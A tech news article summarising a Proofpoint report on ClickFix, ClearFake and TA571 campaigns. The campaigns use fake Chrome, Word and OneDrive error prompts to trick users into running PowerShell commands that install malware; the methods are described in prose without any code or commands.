Threat Actors Are Now Using Fake Google Chrome, Microsoft Word, and OneDrive to Target Users

• Hackers are using fake Google Chrome, Microsoft Word, and OneDrive to install payloads across devices.
• This trick is being used by multiple threat actors, who are sending fake error messages over these apps and tricking users into downloading malware.
• The worst part is that Windows is still unable to detect or block these attacks. Until it's able to do so, the danger persists.

Hackers around the world are constantly coming up with new ways to trick users. In a first of its kind, malicious actors have created fake Google Chrome, Microsoft Word, and OneDrive.

The worst part is that this is not a single operation-multiple threat actors have been found using this trick.

• For instance, TA571, the threat actor known for sending out bulk emails to trick users into downloading malware, was found using this method.
• Similarly, threat actors behind ClearFake and a new attack cluster called ClickFix were also found to be a part of this malicious operation.

How Exactly Does It Work?According to a report by Proofpoint, the payloads used in these attacks are NetSupport, Matanbuchus, Amadey Loader, DarkGate, XMRig, a clipboard hijacker, and Lumma Stealer.

Coming to the methodology of the attack, there are three ways in which these attacks are being carried out. Let's shed light on each one of them.

Method #1 - ClickFix Campaign

The first case is associated with the ClickFix' campaign.

• Here, the threat actors send an error message to users through email (or as website overlays) and then convince them to download their browser's latest update.
• However, the link leads to fake updates, which are then used to install malware onto the victim's device.

In some cases, users are also asked to open Windows PowerShell (Admin)" and paste a certain code provided by the hackers. The end result is the same here as well.

Method #2 - Root CertificateAlternatively, the hackers send a warning to the users, saying that there was some trouble displaying the webpage and that the user needs to install a root certificate".

To do this, the users were directed to copy a PowerShell script into the Windows Clipboard and run it in a Windows Admin console. This script would then display fake messages while silently downloading malware on the device that would steal their information.

Read more: macOS targeted by malicious ads spreading stealer malware

Method #3 - Fake EmailIn the third method, threat actors send emails that look like Microsoft Word document prompts and ask users to download something called Word Online," an extension that will apparently help the users view their documents correctly.

The error message also contained options like How to fix" and Auto-fix," which contain certain commands that can apparently fix the errors (whatever error has been displayed to the user) if pasted into PowerShell. However, in reality, doing so will open up the user's system to malware.

How Effective Are These Tricks?

The biggest problem with these tricks is that Windows is still unable to detect and block them. Until then, users continue to remain vulnerable.

Also, although the attack methods require a great deal of social engineering, they're being employed so cleverly that users actually believe there's something wrong with their system and that it needs to be fixed. This means that the attacks are indeed proving effective.

The post Threat Actors Are Now Using Fake Google Chrome, Microsoft Word, and OneDrive to Target Users appeared first on The Tech Report.